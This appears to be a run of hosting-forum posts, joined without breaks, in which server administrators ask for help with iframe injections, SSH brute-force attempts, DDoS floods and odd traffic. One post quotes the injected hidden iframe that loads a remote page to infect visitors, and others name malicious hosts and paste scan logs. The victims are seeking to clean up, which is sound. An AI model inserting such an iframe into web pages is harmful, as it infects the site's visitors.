It seems that one domain at a cpanel server has been inyected with some iframe code... the problem seems to be that we can not find the iframe code anywhere in the public_html directory.
We already scanned the site public_html directory trying to find the js file or something that can launch the iframe but it seems to be impossible to find, also ran clamscanner in the fold without sucess.
I was thinking about some mod_security rule to block iframe js attacks, does anybody know about this?
This is a RHE 4 + cPanel server, This is the iframe code:
some sites on my server is inserted iframe code to its homepage index.php and index.html I found this topic is discussed on WHT for sometimes but no solution yet. I found a article help to solve this issue but i am lack of knowledge to understand the article.
Yesterday it was discovered that a website had most or all of the html pages compromised with some sort of iframe injection. Every page had an iframe line added to the bottom that attempted to load something from another website. It was coming from a domain called reycross.net and was attempting to load the html/framer virus into the visitor's computer.
The problem is that I cannot identify how the injection hit the system. Here are the facts I can provide...
1. The server does NOT have Joomla or Wordpress.
2. The injection seemed to hit every html page whether the page was active on the site or not.
3. The injection hit only one account.
I have checked /var/log/messages and /var/log/secure and find nothing.
What I don't have is proper ftp logging to determine whether the injection came from that method.
Additional notes: Shortly before the injection took place the box was updated to the latest version of cpanel. Also php was upgraded to 5.2.10. At the time suPHP was enabled but unfortunately had to be disabled because it created problems with another site. Prior to this suPHP was disabled as well.
I went through and removed all instances of this iframe injection and ran another update of cpanel. I also recompiled apache/php and went back to 5.2.8 in case the problem was php related.
but i never added that... and when i look at my footer file (which i include to the bottom of all my other files), its not there. even when i transfer the current one from my server, so its definetly not in that file
any idea how else that could have been added, and how i can take it off. my sites also been acting kind of weird lately, scrolling all the way to the bottom any time a page loads, which is really annoying
I am experiencing a problem, which I think is DDoS Atack.
well, what's happening is that my blog is receiving many requests to do so, asking you download the file xmlrcp.php (part of wordpress) has tried to block this URL that does inframe to receive such visits my blog, but you do not succeeded;
No longer trying to block. htacess etc, nothing else's right!
I have recently found that several of the web sites that I'm hosting on my server have worms that when you access the web sites in Internet Explorer, the antivirus is triggered. When you look an the source code there's always an iframe that loads a remote web page with a worm. Have you seen it already? How did these web sites get infected? Is there an easy way to clean them or is it the hard way? I ran a clamscan on the server and it didn't find anything
I have shared hosting linux server and I have already enabled Firewall,brute-force but form the couple of weeks,I am facing such issue regarding crossside virus tags or scripts,I have already enabled Mod_security2,so can any body help me to prevent such type of iframe tags.
Please let me know how to restrict or prevent "iframe" tags through Mod_security2,if any body have any specific rule for "iframe" tags,
I am not that technically proficient so I have to resort to shared hosting solutions...I am currently with Bluehost.
Problem: I have a small site with minimal needs in terms of storage and bandwidth, but the site is controversial and gets hacked and attacked a lot.
I need a shared hosting provider which ranks higher than most in terms of security.
Recently the site was attacked such that any user going to the site was infected with Trojan horse viruses.
Donno if it's useful or not but here are the files from my PC antivirus which was infected when I went to the site with IE:
File generated by Rogers Online Protection Anti-Virus
C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE5PG8E0SM0gifimg.htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:25 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE5GC9JZWI3gifimg.htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:27 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE5QBPA1ELgifimg.htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:27 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE56SLECSUQgifimg.htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:28 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE5EKTEAS82gifimg.htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:28 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE5P5098OY4gifimg.htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:29 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE5IPGNWAB0gifimg.htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:30 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE55VT8B104gifimg.htm Trojan-Clicker.HTML.IFrame.amh Deleted 11/5/2009 12:21:30 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE543XUDX83gifimg.htm Trojan-Clicker.HTML.IFrame.amh Quarantined 11/5/2009 12:21:31 AM C:Documents and SettingsuserLocal SettingsTemporary Internet FilesContent.IE56SLECSUQgifimg.htm Trojan-Clicker.HTML.IFrame.amh Quarantined 11/5/2009 12:22:18 AM C:Documents and SettingsuserLocal SettingsTemporary Internet
I have a major problem with injecting iframes into every files (header.php footer.php index.php login.php and vars.php ) on all server account.
Code: <iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe> what is the reason and how to fix that ?
and I have the second problem is the rkhunter warnings I am not sure if that have relations with the first problem : rkhunter results:
Code: Checking system commands...
Performing 'strings' command checks Checking 'strings' command [ OK ]
Performing 'shared libraries' checks Checking for preloading variables [ None found ] Checking for preload file [ Not found ] Checking LD_LIBRARY_PATH variable [ Not found ]
Performing file properties checks Checking for prerequisites [ Warning ] /bin/awk [ OK ] /bin/basename [ OK ] /bin/bash [ OK ] /bin/cat [ OK ] /bin/chmod [ OK ] /bin/chown [ OK ] /bin/cp [ OK ] /bin/csh [ OK ] /bin/cut [ OK ] /bin/date [ OK ] /bin/df [ OK ] /bin/dmesg [ OK ] /bin/echo [ OK ] /bin/ed [ OK ] /bin/egrep [ OK ] /bin/env [ OK ] /bin/fgrep [ OK ] /bin/grep [ OK ] /bin/kill [ OK ] /bin/login [ OK ] /bin/ls [ OK ] /bin/mail [ OK ] /bin/mktemp [ OK ] /bin/more [ OK ] /bin/mount [ OK ] /bin/mv [ OK ] /bin/netstat [ OK ] /bin/passwd [ OK ] /bin/ps [ OK ] /bin/pwd [ OK ] /bin/rpm [ OK ] /bin/sed [ OK ] /bin/sh [ OK ] /bin/sort [ OK ] /bin/su [ OK ] /bin/touch [ OK ] /bin/uname [ OK ] /bin/gawk [ OK ] /bin/tcsh [ OK ] /usr/bin/awk [ OK ] /usr/bin/chattr [ OK ] /usr/bin/curl [ OK ] /usr/bin/cut [ OK ] /usr/bin/diff [ OK ] /usr/bin/dirname [ OK ] /usr/bin/du [ OK ] /usr/bin/env [ OK ] /usr/bin/file [ OK ] /usr/bin/find [ OK ] /usr/bin/GET [ Warning ] /usr/bin/groups [ Warning ] /usr/bin/head [ OK ] /usr/bin/id [ OK ] /usr/bin/kill [ OK ] /usr/bin/killall [ OK ] /usr/bin/last [ OK ] /usr/bin/lastlog [ OK ] /usr/bin/ldd [ Warning ] /usr/bin/less [ OK ] /usr/bin/locate [ OK ] /usr/bin/logger [ OK ] /usr/bin/lsattr [ OK ] /usr/bin/lynx [ OK ] /usr/bin/md5sum [ OK ] /usr/bin/newgrp [ OK ] /usr/bin/passwd [ OK ] /usr/bin/perl [ OK ] /usr/bin/pstree [ OK ] /usr/bin/readlink [ OK ] /usr/bin/runcon [ OK ] /usr/bin/sha1sum [ OK ] /usr/bin/size [ OK ] /usr/bin/slocate [ OK ] /usr/bin/stat [ OK ] /usr/bin/strace [ OK ] /usr/bin/strings [ OK ] /usr/bin/sudo [ OK ] /usr/bin/tail [ OK ] /usr/bin/test [ OK ] /usr/bin/top [ OK ] /usr/bin/tr [ OK ] /usr/bin/uniq [ OK ] /usr/bin/users [ OK ] /usr/bin/vmstat [ OK ] /usr/bin/w [ OK ] /usr/bin/watch [ OK ] /usr/bin/wc [ OK ] /usr/bin/wget [ OK ] /usr/bin/whatis [ Warning ] /usr/bin/whereis [ OK ] /usr/bin/which [ OK ] /usr/bin/who [ OK ] /usr/bin/whoami [ OK ] /usr/bin/gawk [ OK ] /sbin/chkconfig [ OK ] /sbin/depmod [ OK ] /sbin/ifconfig [ OK ] /sbin/ifdown [ Warning ] /sbin/ifup [ Warning ] /sbin/init [ OK ] /sbin/insmod [ OK ] /sbin/ip [ OK ] /sbin/lsmod [ OK ] /sbin/modinfo [ OK ] /sbin/modprobe [ OK ] /sbin/nologin [ OK ] /sbin/rmmod [ OK ] /sbin/runlevel [ OK ] /sbin/sulogin [ OK ] /sbin/sysctl [ OK ] /sbin/syslogd [ OK ] /usr/sbin/adduser [ OK ] /usr/sbin/chroot [ OK ] /usr/sbin/groupadd [ OK ] /usr/sbin/groupdel [ OK ] /usr/sbin/groupmod [ OK ] /usr/sbin/grpck [ OK ] /usr/sbin/kudzu [ OK ] /usr/sbin/lsof [ OK ] /usr/sbin/prelink [ OK ] /usr/sbin/pwck [ OK ] /usr/sbin/tcpd [ OK ] /usr/sbin/useradd [ OK ] /usr/sbin/userdel [ OK ] /usr/sbin/usermod [ OK ] /usr/sbin/vipw [ OK ] /usr/sbin/xinetd [ OK ] /usr/local/bin/perl [ OK ] /usr/local/bin/rkhunter [ OK ]
Checking for rootkits...
Performing check of known rootkit files and directories 55808 Trojan - Variant A [ Not found ] ADM Worm [ Not found ] AjaKit Rootkit [ Not found ] aPa Kit [ Not found ] Apache Worm [ Not found ] Ambient (ark) Rootkit [ Not found ] Balaur Rootkit [ Not found ] BeastKit Rootkit [ Not found ] beX2 Rootkit [ Not found ] BOBKit Rootkit [ Not found ] CiNIK Worm (Slapper.B variant) [ Not found ] Danny-Boy's Abuse Kit [ Not found ] Devil RootKit [ Not found ] Dica-Kit Rootkit [ Not found ] Dreams Rootkit [ Not found ] Duarawkz Rootkit [ Not found ] Enye LKM [ Not found ] Flea Linux Rootkit [ Not found ] FreeBSD Rootkit [ Not found ] ****`it Rootkit [ Not found ] GasKit Rootkit [ Not found ] Heroin LKM [ Not found ] HjC Kit [ Not found ] ignoKit Rootkit [ Not found ] ImperalsS-FBRK Rootkit [ Not found ] Irix Rootkit [ Not found ] Kitko Rootkit [ Not found ] Knark Rootkit [ Not found ] Li0n Worm [ Not found ] Lockit / LJK2 Rootkit [ Not found ] Mood-NT Rootkit [ Not found ] MRK Rootkit [ Not found ] Ni0 Rootkit [ Not found ] Ohhara Rootkit [ Not found ] Optic Kit (Tux) Worm [ Not found ] Oz Rootkit [ Not found ] Phalanx Rootkit [ Not found ] Phalanx Rootkit (strings) [ Not found ] Portacelo Rootkit [ Not found ] R3dstorm Toolkit [ Not found ] RH-Sharpe's Rootkit [ Not found ] RSHA's Rootkit [ Not found ] Scalper Worm [ Not found ] Sebek LKM [ Not found ] Shutdown Rootkit [ Not found ] SHV4 Rootkit [ Not found ] SHV5 Rootkit [ Not found ] Sin Rootkit [ Not found ] Slapper Worm [ Not found ] Sneakin Rootkit [ Not found ] Suckit Rootkit [ Not found ] SunOS Rootkit [ Not found ] SunOS / NSDAP Rootkit [ Not found ] Superkit Rootkit [ Not found ] TBD (Telnet BackDoor) [ Not found ] TeLeKiT Rootkit [ Not found ] T0rn Rootkit [ Not found ] Trojanit Kit [ Not found ] Tuxtendo Rootkit [ Not found ] URK Rootkit [ Not found ] VcKit Rootkit [ Not found ] Volc Rootkit [ Not found ] X-Org SunOS Rootkit [ Not found ] zaRwT.KiT Rootkit [ Not found ]
Performing additional rootkit checks Suckit Rookit additional checks [ OK ] Checking for possible rootkit files and directories [ None found ] Checking for possible rootkit strings [ None found ]
Performing malware checks Checking running processes for suspicious files [ None found ] Checking for login backdoors [ None found ] Checking for suspicious directories [ None found ] Checking for sniffer log files [ None found ]
Performing trojan specific checks Checking for enabled xinetd services [ None found ] Checking for Apache backdoor [ Not found ]
Performing Linux specific checks Checking kernel module commands [ OK ] Checking kernel module names [ OK ] Checking the network...
Performing check for backdoor ports Checking for UDP port 2001 [ Not found ] Checking for TCP port 2006 [ Not found ] Checking for TCP port 2128 [ Not found ] Checking for TCP port 14856 [ Not found ] Checking for TCP port 47107 [ Not found ] Checking for TCP port 60922 [ Not found ]
Performing checks on the network interfaces Checking for promiscuous interfaces [ None found ]
Checking the local host...
Performing system boot checks Checking for local host name [ Found ] Checking for local startup files [ Found ] Checking local startup files for malware [ None found ] Checking system startup files for malware [ None found ]
Performing group and account checks Checking for passwd file [ Found ] Checking for root equivalent (UID 0) accounts [ None found ] Checking for passwordless accounts [ None found ] Checking for passwd file changes [ None found ] Checking for group file changes [ None found ] Checking root account shell history files [ OK ]
Performing system configuration file checks Checking for SSH configuration file [ Found ] Checking if SSH root access is allowed [ Warning ] Checking if SSH protocol v1 is allowed [ Warning ] Checking for running syslog daemon [ Found ] Checking for syslog configuration file [ Found ] Checking if syslog remote logging is allowed [ Not allowed ]
Performing filesystem checks Checking /dev for suspicious file types [ None found ] Checking for hidden files and directories [ Warning ] Checking application versions...
Checking version of Exim MTA [ OK ] Checking version of GnuPG [ Warning ] Checking version of Apache [ Skipped ] Checking version of Bind DNS [ OK ] Checking version of OpenSSL [ Warning ] Checking version of PHP [ OK ] Checking version of Procmail MTA [ OK ] Checking version of OpenSSH [ OK ]
I am trying to display a page, from the content site, through an iFrame, on the Moodle site, and am getting a console.log error message of "Refused to display 'http://subdomain.myCompany.com/index.php' in a frame because it set 'X-Frame-Options' to 'SAMEORIGIN'."
I have been doing a lot of reading and it sounds like the X-Frame-Options is deprecated and that I should be controlling things through Content-Security-Policy and frame-ancestors. How do I allow content from a sub-domain to load into an iFrame on my moodle site?
I have a website on domain x like https://example.com. One of our customers want to use their own domain name in the address bar and redirect to our web application. In the control panel of the customers website, we can forward the site to our domain without issues (stealth forwarding). After that, we are able to see the site and navigate to some options. But there are some issues/limitations. I cannot open some links, or click on tabs. The login feature works for chrome but not for internet explorer. Is this due the jump of http to https within an iframe? Or is it related to CORS? I have a Windows 2008 R2 server with Apache, which is the frond-end for the tomcat instances. "Tomcat Apache" serves our Java-based web application (mod_jk binded) ...
All my sites on both my hosting accounts are infected with an iframe.
At the end of the index.html files the malicious code just appeared...suddenly 3 weeks ago.
The host blamed Joomla so I took the appropriate steps:
Upgraded my Joomla to the latest version, changed the whole account username and password, changed the configuration and template to unwriteable.
It stopped the injection for a few days but then it came back. I would also like to add that 2 other sites on my account, one simple index.html file and an old website I have that is totally HTML with nothing to do with Joomla also got infected.
The iframe also infected a Drupal install I did as a test.
So according to these fact is this a Hosting Company not taking responsibility or can a Joomla site infected spread to other normal HTML sites and different CMS's on the server?
This situation is ruinning me and I strongly suspect it's a Hosting problem and not Joomla.
Any expert opinions from true professionals would be appreciated because if I can prove that it's not a Joomla issue I might take legal action against the hosting company since this has cost me dozens of hours of work and several hundred dollars of lost revenue.
I am attaching the iframe exploit. It installs itself on every index file...in every folder - components, mambots, ect..additionally it attaches itself on any and every kind of addon that has an index.html file.
My server stop responding, I couldn't access via webmin or ssh, and DNS were not responding, so I have to ask for a reboot and now everything is fine.
Looking at the logs I found this:
Code: Jul 18 19:23:12 server sshd: Failed password for root from 184.108.40.206 port 56817 ssh2 Jul 18 19:23:12 server sshd: Failed password for root from 220.127.116.11 port 60227 ssh2 Jul 18 19:23:13 server sshd: Failed password for root from 18.104.22.168 port 38038 ssh2 Jul 18 19:23:15 server sshd: Failed password for root from 22.214.171.124 port 49884 ssh2 Jul 18 19:24:30 server sshd: Failed password for root from 126.96.36.199 port 37929 ssh2 Jul 18 19:25:06 server sshd: Did not receive identification string from 188.8.131.52 Jul 18 19:25:09 server sshd: Did not receive identification string from 184.108.40.206 Jul 18 19:25:14 server sshd: fatal: Timeout before authentication for UNKNOWN Jul 18 19:26:00 server sshd: Did not receive identification string from 220.127.116.11 And searching that IP on google I found it here: http://www.tcc.edu.tw/netbase/net/in...?fun=240&prd=3
And is flagged as a SSH Attack.
Any ideas why my server stopped working? and how to prevent it?
My site currently in prolong HTTP flood attack since 2 weeks ago. The attack was never stop and for this moment i could only mitigate the attack using my own firewall (hardware).
Since my ISP is not interested to help from upstream, even provide any mitigation services, i could only doing mitigation on my own source or using proxy services alternatively as well, but i've chose to tried on my own. I've tried once on one of well-known mitigation services out there but it seems not fully satisfied me since most of legitimate traffic is blocked from their source.
What i could do now is keep staying alive as well as will not going down on whatever situation becomes worst (but if the attack change to udp attack, i couldn't help myself coz there must be high incoming bandwidth into my network). My network is totaling 10MB last time but since this attack i've been forced to subscribe for 30MB in order to keep balance on the attack.
I've blocked all access except for my country and some other neighbours. If i change policy to allow all countries, the load of firewall will become max and after that hang will hang in less than a minute. I've done load balancing of 4 servers (8GB memory each one) and it seems the condition is getting under control with slight problem of server hang (memory shortage) and very limited keep alive connection.
Now what am i thinking is to buy a router objectively to null route incoming specific IP of countries so i can change my firewall policy to allow all connections as well as to help the firewall itself release its burden halting blocked IP that currently keep hitting itself that could might impact its performance.
Which brands of router is possible doing this thing?
Do you have some other suggestions instead of buying router?
i am just having one issue in one of my highly visited website hangibar.com, its being hosted in softlayer, we are facing synattack too much in this website.
the solution which microsoft given in their website related with tcp/ip registry entry but thing is same , some where and some connections become increases too much over tcp/ip. due to that reason website become very sticky and it stop functioning the execution of sql process, during this issue i have to restart the server to establish a fresh connection.
When i tried to view this http://gihkus.com/Lnx.txt it seems to be attack on my server. http://gihkus.com/Lnx.txt is not hosted by us. I have disabled perl support on all domains hosted on our server but still we are under attack. There is nothing special in /tmp.
Over the past day one of my servers has seen a huge rise in incomming traffic (from normal web requests to a constant 4Mbit/s, peaking upto 80Mbit/s). My outgoing traffic has remained at its normal profile, so I am pretty sure that these are not web requests, and it does not seem to be having an adverse effect on the server (the site still runs perfectly well and quick and load is still less than 1).
However, I am unsure as to how to identify what this traffic is? Are there any easy ways to tell on a FreeBSD server what the source and type of incomming traffic is? I have tried playing with netstat, but an not getting anything useful - I would like to see which ports are involved.
Am Really suffering here for ddos attack ( apache - pop3 ) every week my server under attack am using APF but now am really wanna get red from it am looking for a powerfull firewall I do not know if CSF Could stop this attack like limiting receiving SYN from an ip or any other policy another thing . i have get this rules from forums but am really weak at iptables rules so can any one help my if these rules useful or not . against Dos attack:
iptables -t nat -N syn-flood iptables -t nat -A syn-flood -m limit --limit 12/s --limit-burst 24 -j RETURN iptables -t nat -A syn-flood -j DROP iptables -t nat -A PREROUTING -i eth0 -d (dest ip) -p tcp --syn -j syn-flood
I have a windows server, and today it has a large inbound traffic, so I tried to disable all web service, and after that, the result of netstat -an shows no connection at all, but the server still has large inbound traffic,